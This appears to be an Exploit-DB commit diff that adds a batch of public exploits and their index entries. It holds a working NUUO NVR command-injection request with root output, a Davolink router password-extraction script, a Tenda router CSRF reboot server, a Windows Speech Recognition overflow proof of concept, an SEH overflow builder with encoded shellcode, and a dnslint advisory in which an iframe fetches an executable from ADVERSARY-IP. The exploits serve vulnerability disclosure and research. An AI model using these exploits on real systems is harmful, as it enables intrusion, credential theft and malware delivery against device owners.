DB: 2018-07-24

7 changes to exploits/shellcodes

Windows Speech Recognition - Buffer Overflow

Knox Software Arkeia 4.0 - Backup Local Overflow
Knox Arkeia 4.0 Backup - Local Overflow

Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)

Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)
Knox Arkeia Backup Client 5.3.3 Type 77 (OSX) - Overflow (Metasploit)

Microsoft Windows - 'dnslint.exe' Drive-By Download
NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution
Davolink DVW 3200 Router - Password Disclosure
Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)

Linux/x86 - Bind (4444/TCP) Shell + IPv6 Shellcode (100 bytes)

exploits/hardware/webapps/45070.txt

@@ -0,0 +1,60 @@
+# Exploit Title: NUUO NVR Unauthenticated Remote Code Execution
+# Exploit Author: Berk Dusunur
+# Google Dork: N/A
+# Date: 2018-07-21
+# Vendor Homepage: http://www.nuuo.com/
+# Software Link: http://www.nuuo.com/
+# Affected Version: v2016
+# Tested on: Parrot OS
+# CVE : N/A
+
+
+# Proof Of Concept
+
+
+GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;whoami;%27 HTTP/1.1
+Host: target:50000
+Connection: keep-alive
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
+
+HTTP/1.1 200 OK
+X-Powered-By: PHP/5.6.13
+Content-type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Date: Sat, 21 Jul 2018 15:54:09 GMT
+Server: lighttpd/1.4.39
+
+upload_tmp_dir=/mtd/block3 root
+
+GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27 HTTP/1.1
+Host: target:5000
+Connection: keep-alive
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+Cookie: PHPSESSID=7b74657ab949a442c9e440ccf050de1e; lang=en
+
+
+
+HTTP/1.1 200 OK
+X-Powered-By: PHP/5.6.13
+Content-type: text/html; charset=UTF-8
+Transfer-Encoding: chunked
+Date: Sat, 21 Jul 2018 15:54:09 GMT
+Server: lighttpd/1.4.39
+
+
+upload_tmp_dir=/mtd/block3 uid=0(root) gid=0(root)

exploits/hardware/webapps/45076.py

@@ -0,0 +1,43 @@
+# Exploit Title: Davolink DVW 3200 Router - Password Disclosure
+# Google Dork: N/A
+# Zoomeye dork : https://www.zoomeye.org/searchResult?q=%22var%20user_passwd%22%20%2Bapp%3A%22DAVOLINK%20GAPD-7000%20WAP%20httpd%22 
+# Date: 2018-07-13
+# Exploit Author: Ankit Anubhav
+# Vendor Homepage: www.davolink.co.kr
+# Software Link: N/A
+# Version: DVW 3200
+# Tested on: Python 2.7 Windows 10
+# CVE : N/A
+
+# Many Davolink Davolink DV 3200 devices credentials can be disclosed using the following script.
+# Author : Ankit Anubhav (ankitanubhav.com)  of NewSky Security ( https://www.newskysecurity.com/ )
+
+# Usage script.py 1.3.3.7 where 1.3.3.7 is the Davolink DV 3200 IP.
+# Use responsibly only for research and testing purposes.
+# Tested with python 2.7
+
+import sys
+import urllib2
+import re
+import base64
+
+def davolink_credfinder(ip):
+        try:
+		req = urllib2.Request('http://' + ip + ':' + '88', headers={ 'User-Agent': 'Mozilla/5.0' })
+		connection_check = str(urllib2.urlopen(req).getcode())
+
+		if (connection_check == "200"):
+			html = urllib2.urlopen(req).read()
+			str_html = str(html)
+			m=re.compile('var user\_passwd\=\"(.*?)\"').search(str_html)
+			encoded_pwd =str(m.group(1))
+			actual_pwd = base64.b64decode(encoded_pwd)
+			print "**************************************************************************************************"
+			print "The password for the Davolink device is " + actual_pwd
+			print "**************************************************************************************************"
+	        else:
+			print "Connection to port 88 was not successful. Cant find credentials,sorry." 
+	except:
+		print "There was an error in connecting to the IP." 
+
+davolink_credfinder(sys.argv[1])

exploits/hardware/webapps/45078.py

@@ -0,0 +1,59 @@
+# Exploit Title: Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)
+# Date: 2018-07-21
+# Exploit Author: Nathu Nandwani
+# Website: http://nandtech.co
+# CVE: CVE-2015-5996
+#
+# Description:
+#
+# The router is vulnerable to a cross-site request forgery attacker. 
+# If an administrator is currently logged in and visits a 
+# remote webpage containing forms existing in the router's firmware, 
+# a request can be forged to modify existing settings or even 
+# set the router to its default state.
+#
+# These are two examples that can work in the proof of concept: 
+# /goform/SysToolReboot - Reboot the router
+# /goform/SysToolRestoreSet - Set the router to default settings
+#
+# Reference: https://www.kb.cert.org/vuls/id/630872
+
+import socket
+
+server_ip = "0.0.0.0"
+server_port = 80
+
+router_ip = "192.168.0.1"
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.bind((server_ip, server_port))
+sock.listen(1)
+
+print "Currently listening at " + server_ip + ":" + str(server_port)        
+
+client, (client_host, client_port) = sock.accept()
+
+print "Client connected: " + client_host + ":" + str(client_port)
+print ""
+print client.recv(1000)
+
+client.send('HTTP/1.0 200 OK\r\n')
+client.send('Content-Type: text/html\r\n')
+client.send('\r\n')
+client.send("""
+<html>
+    <body>
+        <form method="post" id="frmSetup" name="frmSetup" action="http://""" + router_ip + """/goform/SysToolReboot">
+            <input name="CMD" value="SYS_CONF" type="hidden">
+            <input name="GO" value="system_reboot.asp" type="hidden">
+            <input name="CCMD" value="0" type="hidden">
+        </form>
+        <script>
+            document.getElementById("frmSetup").submit();
+        </script>
+    </body>
+</html>
+""")
+
+client.close()
+sock.close()

exploits/windows/dos/45077.txt

@@ -0,0 +1,179 @@
+# Title: Windows Speech Recognition- Buffer Overflow
+
+# Author: Nassim Asrir
+
+# Contact: wassline@gmail.com | https://www.linkedin.com/in/nassim-asrir-b73a57122/
+
+# Vendor: https://www.microsoft.com/
+
+About Windows Speech Recognition:
+=================================
+
+Windows Speech Recognition lets you control your PC by voice alone, without needing a keyboard or mouse.
+
+Details:
+========
+
+If we navigate the Speech directory on Windows 10 we will get some (dll) files but the interest file is (Xtel.dll).
+
+And in the normal case if we say something. that mean as there a variable which register what we say.
+
+And if we play around "Xtel.dll" we will find a function named "Speak" which take to parameter "lineID as Long" and "text as String"
+
+When we inject "A*3092" that lead to Buffer Overflow Vulnerability.
+
+The crash occur in "6344164F	MOV ECX,[EAX+2C]" 
+
+
+/* struct s0 {
+    int8_t[44] pad44;
+    int32_t f44;
+};
+
+void fun_634548b6(int32_t ecx, int32_t a2, int32_t a3, int32_t a4, int32_t a5);
+
+void fun_63441643() {
+    int32_t ecx1;
+    struct s0* v2;
+    int32_t v3;
+
+    ecx1 = v2->f44;
+    fun_634548b6(ecx1, v3, 0, 1, __return_address());
+} */
+
+Now we will run our POC.
+
+0:000> g
+ModLoad: 74250000 74276000   C:\WINDOWS\SysWOW64\IMM32.DLL
+ModLoad: 74d60000 74d6f000   C:\WINDOWS\SysWOW64\kernel.appcore.dll
+ModLoad: 71850000 718cc000   C:\WINDOWS\SysWOW64\uxtheme.dll
+ModLoad: 6ee90000 6ef16000   C:\WINDOWS\SysWOW64\sxs.dll
+ModLoad: 77590000 776d4000   C:\WINDOWS\SysWOW64\MSCTF.dll
+ModLoad: 6f720000 6f743000   C:\WINDOWS\SysWOW64\dwmapi.dll
+ModLoad: 6bc40000 6bddc000   C:\WINDOWS\SysWOW64\urlmon.dll
+ModLoad: 777f0000 77878000   C:\WINDOWS\SysWOW64\shcore.dll
+ModLoad: 6cb20000 6cd45000   C:\WINDOWS\SysWOW64\iertutil.dll
+ModLoad: 74790000 74d4a000   C:\WINDOWS\SysWOW64\windows.storage.dll
+ModLoad: 76f00000 76f45000   C:\WINDOWS\SysWOW64\shlwapi.dll
+ModLoad: 776f0000 77708000   C:\WINDOWS\SysWOW64\profapi.dll
+ModLoad: 75230000 75275000   C:\WINDOWS\SysWOW64\powrprof.dll
+ModLoad: 77730000 77738000   C:\WINDOWS\SysWOW64\FLTLIB.DLL
+ModLoad: 74340000 743c3000   C:\WINDOWS\SysWOW64\clbcatq.dll
+ModLoad: 63a90000 63ac6000   C:\Windows\SysWOW64\scrobj.dll
+ModLoad: 6b730000 6b741000   C:\WINDOWS\SysWOW64\WLDP.DLL
+ModLoad: 77200000 77396000   C:\WINDOWS\SysWOW64\CRYPT32.dll
+ModLoad: 753a0000 753ae000   C:\WINDOWS\SysWOW64\MSASN1.dll
+ModLoad: 751e0000 75227000   C:\WINDOWS\SysWOW64\WINTRUST.dll
+ModLoad: 73010000 73023000   C:\WINDOWS\SysWOW64\CRYPTSP.dll
+ModLoad: 72fb0000 72fdf000   C:\WINDOWS\SysWOW64\rsaenh.dll
+ModLoad: 73820000 73839000   C:\WINDOWS\SysWOW64\bcrypt.dll
+ModLoad: 63a80000 63a8a000   C:\Windows\SysWOW64\MSISIP.DLL
+ModLoad: 74540000 7459f000   C:\WINDOWS\SysWOW64\coml2.dll
+ModLoad: 63a60000 63a78000   C:\Windows\SysWOW64\wshext.dll
+ModLoad: 75480000 767ca000   C:\WINDOWS\SysWOW64\SHELL32.dll
+ModLoad: 74d70000 74da9000   C:\WINDOWS\SysWOW64\cfgmgr32.dll
+ModLoad: 63b00000 63b86000   C:\Windows\SysWOW64\vbscript.dll
+ModLoad: 63af0000 63aff000   C:\WINDOWS\SysWOW64\amsi.dll
+ModLoad: 73950000 73971000   C:\WINDOWS\SysWOW64\USERENV.dll
+ModLoad: 63ad0000 63ae9000   C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1806.18062-0\X86\MpOav.dll
+ModLoad: 63440000 63472000   C:\Windows\speech\Xtel.dll
+(347c.1e00): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\speech\Xtel.dll - 
+eax=00000001 ebx=63441643 ecx=63441643 edx=ffffffff esi=02c93664 edi=02c93644
+eip=6344164f esp=02afe2b0 ebp=02afe2d8 iopl=0         nv up ei pl nz na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
+Xtel+0x164f:
+6344164f 8b482c          mov     ecx,dword ptr [eax+2Ch] ds:002b:0000002d=???????? <=====
+
+Now we will try to find our injected "AAA"
+
+0:000> s -a 0x00000000 L?7fffffff "AAAAA"
+
+75db1cad  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cae  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1caf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb1  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb3  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb5  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb7  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cb9  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cba  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cbb  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cbc  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cbd  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cbe  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cbf  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc1  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc2  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc3  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc4  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc5  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc6  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc7  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc8  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cc9  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+75db1cca  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
+
+0:000> k
+ # ChildEBP RetAddr  
+00 030fe6a8 753de4ef Xtel+0x164f
+01 030fe6c8 753cf69d OLEAUT32!DispCallFunc+0x16f
+02 030fe980 634454eb OLEAUT32!CTypeInfo2::Invoke+0x2ed
+WARNING: Stack unwind information not available. Following frames may be wrong.
+03 030fe9b0 6344a27f Xtel+0x54eb
+04 030fe9dc 63b1b6e7 Xtel!DllUnregisterServer+0x502
+05 030fea20 63b2832f vbscript!IDispatchInvoke2+0x96
+06 030fec6c 63b2fdcc vbscript!InvokeDispatch+0x5ef
+07 030fee84 63b29677 vbscript!CScriptRuntime::RunNoEH+0x5bbc
+08 030feed4 63b289d5 vbscript!CScriptRuntime::Run+0xc7
+09 030fefe4 63b23e93 vbscript!CScriptEntryPoint::Call+0xe5
+0a 030ff070 63b25265 vbscript!CSession::Execute+0x443
+0b 030ff0bc 63b262c2 vbscript!COleScript::ExecutePendingScripts+0x15a
+0c 030ff0e0 63a9c143 vbscript!COleScript::SetScriptState+0x62
+0d 030ff10c 63a9cd22 scrobj!ComScriptlet::Inner::StartEngines+0x7c
+0e 030ff1f8 63a9b222 scrobj!ComScriptlet::Inner::Init+0x222
+0f 030ff20c 63a9b00c scrobj!ComScriptlet::New+0x43
+10 030ff230 003de390 scrobj!ComScriptletConstructor::Create+0x3c
+11 030ff2b8 003d9693 wscript!CHost::RunXMLScript+0x411
+12 030ff508 003dae64 wscript!CHost::Execute+0x284
+13 030ffac4 003d8f75 wscript!CHost::Main+0x574
+14 030ffd7c 003d9144 wscript!StringCchPrintfA+0xfa9
+15 030ffda8 003d7a83 wscript!WinMain+0x1a9
+16 030ffdf8 76f68484 wscript!WinMainCRTStartup+0x63
+17 030ffe0c 779d2fea KERNEL32!BaseThreadInitThunk+0x24
+18 030ffe54 779d2fba ntdll!__RtlUserThreadStart+0x2f
+19 030ffe64 00000000 ntdll!_RtlUserThreadStart+0x1b
+
+POC:
+===
+
+<?XML version='1.0' standalone='yes' ?>
+<package><job id='DoneInVBS' debug='false' error='true'>
+<object classid='clsid:FC9E740F-6058-11D1-8C66-0060081841DE' id='target' />
+<script language='vbscript'>
+
+'Wscript.echo typename(target)
+
+'for debugging/custom prolog
+vulnerable_DLL = "C:\Windows\speech\Xtel.dll"
+prototype  = "Sub Speak ( ByVal lineID As Long ,  ByVal text As String )"
+vulnerable_function = "Speak"
+progid     = "TELLib.phone"
+argCount   = 2
+
+arg1=1
+arg2=String(3092, "AAAAA")
+
+target.Speak arg1 ,arg2 
+
+</script></job></package>
+
+#EOF

exploits/windows/local/45071.py

@@ -0,0 +1,88 @@
+#!/usr/bin/python
+
+#
+# Exploit Author: bzyo
+# Twitter: @bzyo_
+# Exploit Title: Splinterware System Scheduler Pro 5.12 - Local Buffer Overflow (SEH)
+# Date: 07-21-18
+# Vulnerable Software: System Scheduler Pro 5.12
+# Vendor Homepage: https://www.splinterware.com
+# Version: 5.12
+# Software Link: https://www.splinterware.com/download/ssproeval.exe
+# Tested Windows 7 SP1 x86
+#
+# 
+#
+# PoC
+# 1. generate sysschedule512.txt, copy contents to clipboard
+# 2. open application
+# 3. select view, preferences and in the Startup/Logging tab
+# 4. paste contents from clipboard to the logfile location field
+# 5. exit preferences
+# 6. create dummy task to open notepad.exe
+# 7. run task, notepad opens
+# 8. close notepad
+# 9. pop-up window appears and application crashes
+
+
+
+import struct
+
+filename="sysschedule512.txt"
+
+junk = "A"*55
+
+#thx giuseppe d'amore for edb-id 28996; edited pop-up msg & encoded
+#msfencode -e x86/alpha_mixed -i bzyo; size 287 
+msg = ("\x89\xe5\xda\xc4\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" 
+"\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" 
+"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" 
+"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" 
+"\x75\x4a\x49\x74\x71\x58\x52\x4c\x72\x30\x30\x52\x44\x6c" 
+"\x4b\x75\x42\x4c\x4b\x62\x72\x34\x4c\x4e\x6b\x30\x52\x45" 
+"\x4c\x6e\x6b\x73\x72\x56\x68\x6c\x4b\x64\x32\x31\x30\x6c" 
+"\x4b\x66\x72\x4d\x50\x33\x4e\x66\x6c\x50\x33\x32\x55\x39" 
+"\x62\x4f\x79\x6a\x67\x43\x33\x62\x58\x67\x4c\x6c\x4b\x56" 
+"\x37\x33\x48\x66\x61\x4a\x62\x4e\x6b\x51\x6a\x77\x50\x55" 
+"\x51\x49\x57\x66\x51\x58\x6d\x4e\x6b\x30\x34\x6c\x6f\x76" 
+"\x61\x69\x56\x57\x35\x4d\x51\x67\x4e\x31\x56\x35\x31\x74" 
+"\x34\x63\x51\x64\x35\x49\x62\x4f\x71\x43\x4e\x46\x68\x53" 
+"\x75\x53\x48\x71\x79\x64\x34\x30\x75\x5a\x49\x6c\x4b\x30" 
+"\x7a\x51\x34\x33\x31\x59\x57\x42\x46\x4c\x4b\x44\x6c\x50" 
+"\x6f\x4e\x6b\x52\x5a\x45\x4c\x65\x51\x4b\x77\x6e\x6b\x71" 
+"\x6c\x6e\x4f\x6b\x4c\x55\x51\x38\x47\x51\x78\x37\x51\x75" 
+"\x71\x37\x51\x76\x61\x65\x38\x71\x52\x61\x4a\x43\x69\x50" 
+"\x4f\x50\x68\x31\x30\x55\x71\x64\x61\x67\x51\x6d\x59\x48" 
+"\x61\x6b\x4e\x73\x79\x66\x6b\x44\x71\x6b\x70\x66\x31\x50" 
+"\x50\x49\x6f\x68\x57\x41\x41")
+
+junk1 = "B"*56
+
+#jmp back to As
+jmp3 = "\xe9\x6f\xfe\xff\xff"
+
+junk2= "C"*4
+
+#jmp back after random 8 nulls added
+jmp2 = "\xeb\xf5" 
+
+junk3 = "C"*10
+
+#jmp back before random 8 nulls added
+jmp = "\xeb\xf2\xcc\xcc"
+
+seh = struct.pack('<L',0x00413121)
+
+buffer = junk + msg + junk1 + jmp3 + junk2 + jmp2 + junk3 + jmp + seh 
+  
+textfile = open(filename , 'w')
+textfile.write(buffer)
+textfile.close()
+
+# Timeline
+#---------------------------------------------------------------------
+#05-02-18: Vendor notified of vulnerability
+#05-03-18: Initial vendor response
+#05-09-18: Issues resolved after some back and forth discussion
+#07-20-18: New version released, 5.13, with issue fixed
+#07-21-18: Submitted public disclosure

exploits/windows/remote/45079.txt

@@ -0,0 +1,101 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-DNSLINT.EXE-FORCED-DRIVE-BY-DOWNLOAD.txt
+[+] ISR: Apparition Security          
+
+
+***Greetz: indoushka | Eduardo***  
+
+
+Vendor
+=================
+www.microsoft.com
+
+
+Product
+===========
+dnslint.exe - DNS Tool
+
+
+DNSLint is a Microsoft Windows CL utility that helps you to diagnose common DNS name resolution issues.
+The utility not installed by default on Windows and must be downloaded from microsoft website.
+
+
+
+Vulnerability Type
+===================
+Forced Drive-by Download
+
+
+
+Security Issue
+================
+The tool doesn't verify domain names when parsing DNS text-files using the "/ql" switch making it prone to forced drive-by
+downloads, providing an end user is tricked into using a server text-file containing a script/binary reference instead of
+a normally expected domain name.
+
+Normal usage:
+(/r flag generates a report)
+dnslint.exe /v /y /d somedomain.com /s X.X.X.X /r myreport
+
+Unintended consequence usage:
+dnslint.exe /v /y /d "MALWARE-FILE" /s X.X.X.X /r "myreport"
+
+This potentially allows forced downloading of a remote executable to end users host when the report is veiwed in a web browser.
+Because the download "seemingly" comes from a "trusted" LOCAL location, an end user may "trust" it and ignore Security warnings
+normally associated with opening executables from their browser.
+
+e.g.
+
+The generated report is referenced as Local URI e.g. file:///c:/myreport.html and doesn't visibly point at some remote URL.
+
+
+Exploit/POC
+============
+double slashes required "//" to deal with "spaces" or will break injection.
+where X.X.X.X is the DNS server IP or use 8.8.8.8 (google DNS), ADVERSARY-IP (attacker IP).
+
+1) "dnslint-update.exe" on remote web server root dir.
+
+
+2) "servers.txt"
+
+DNSLint
+;This is a sample DNSLint input file
+
++This DNS server is called: dns1.cp.msft.net
+[dns~server] X.X.X.X
+
+<iframe//src="http://ADVERSARY-IP/dnslint-update.exe"//style="width:0;height:0;border:0;border:none;"></iframe>,a,r ;A record
+X.X.X.X,ptr,r ;PTR record
+test1,cname,r ;CNAME record
+test2,mx,r ;MX record
+
+
+3) dnslint.exe /ql servers.txt
+
+
+BOOOOOOOM Malwarez dropped :)
+Optionally, you can point dnslint.exe at a Network share file: \\ADVERSARY-IP\servers.txt
+
+
+Network Access
+===============
+Remote
+
+
+Severity
+=========
+High 7.6
+CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

files_exploits.csv

@@ -6023,6 +6023,7 @@ id,file,description,date,author,type,platform,port
 45060,exploits/multiple/dos/45060.html,"Google Chrome - Swiftshader Blitting Floating-Point Precision Errors",2018-07-19,"Google Security Research",dos,multiple,
 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,
+45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow",2018-07-23,"Nassim Asrir",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -7805,7 +7806,7 @@ id,file,description,date,author,type,platform,port
 19508,exploits/linux/local/19508.sh,"SuSE Linux 6.2 sscw - HOME Environment Variable Buffer Overflow",1999-09-23,"Brock Tellier",local,linux,
 19509,exploits/solaris/local/19509.sh,"Solaris 2.6 - Profiling File Creation",1999-09-22,"Steve Mynott",local,solaris,
 19510,exploits/linux/local/19510.pl,"SSH Communications Security SSH 1.2.27 - Authentication Socket File Creation",1999-09-17,"Tymm Twillman",local,linux,
-19511,exploits/linux/local/19511.c,"Knox Software Arkeia 4.0 - Backup Local Overflow",1999-09-26,"Brock Tellier",local,linux,
+19511,exploits/linux/local/19511.c,"Knox Arkeia 4.0 Backup - Local Overflow",1999-09-26,"Brock Tellier",local,linux,
 19512,exploits/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0 / Gnome Libs 1.0.8 - 'espeaker' Local Buffer Overflow",1999-09-26,"Brock Tellier",local,linux,
 19516,exploits/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS - ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",local,windows,
 19517,exploits/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",local,linux,
@@ -9824,6 +9825,7 @@ id,file,description,date,author,type,platform,port
 45041,exploits/hardware/local/45041.txt,"Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Restricted Shell Escape",2018-07-17,LiquidWorm,local,hardware,
 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
+45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -11143,7 +11145,7 @@ id,file,description,date,author,type,platform,port
 9927,exploits/osx/remote/9927.rb,"mDNSResponder 10.4.0/10.4.8 (OSX) - UPnP Location Overflow (Metasploit)",2009-10-28,Metasploit,remote,osx,
 9928,exploits/osx/remote/9928.rb,"WebSTAR FTP Server 5.3.2 (OSX) - USER Overflow (Metasploit)",2004-07-13,ddz,remote,osx,21
 9929,exploits/osx/remote/9929.rb,"Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)",2006-03-01,"H D Moore",remote,osx,25
-9930,exploits/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 (OSX) - Type 77 Overflow (Metasploit)",2005-02-18,"H D Moore",remote,osx,
+9930,exploits/osx/remote/9930.rb,"Knox Arkeia Backup Client 5.3.3 Type 77 (OSX) - Overflow (Metasploit)",2005-02-18,"H D Moore",remote,osx,
 9931,exploits/osx/remote/9931.rb,"AppleFileServer 10.3.3 (OSX) - LoginEXT PathName Overflow (Metasploit)",2004-03-03,"H D Moore",remote,osx,548
 9932,exploits/novell/remote/9932.rb,"Novell NetWare 6.5 SP2-SP7 - LSASS CIFS.NLM Overflow (Metasploit)",2007-01-21,toto,remote,novell,
 9934,exploits/multiple/remote/9934.rb,"Wyse Rapport Hagent Fake Hserver - Command Execution (Metasploit)",2009-07-10,kf,remote,multiple,
@@ -16633,6 +16635,7 @@ id,file,description,date,author,type,platform,port
 45043,exploits/linux/remote/45043.rb,"QNAP Q'Center - 'change_passwd' Command Execution (Metasploit)",2018-07-17,Metasploit,remote,linux,443
 45044,exploits/multiple/remote/45044.rb,"Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)",2018-07-17,Metasploit,remote,multiple,3333
 45052,exploits/hardware/remote/45052.py,"HomeMatic Zentrale CCU2 - Remote Code Execution",2018-07-18,"Kacper Szurek",remote,hardware,
+45079,exploits/windows/remote/45079.txt,"Microsoft Windows - 'dnslint.exe' Drive-By Download",2018-07-23,hyp3rlinx,remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39693,3 +39696,6 @@ id,file,description,date,author,type,platform,port
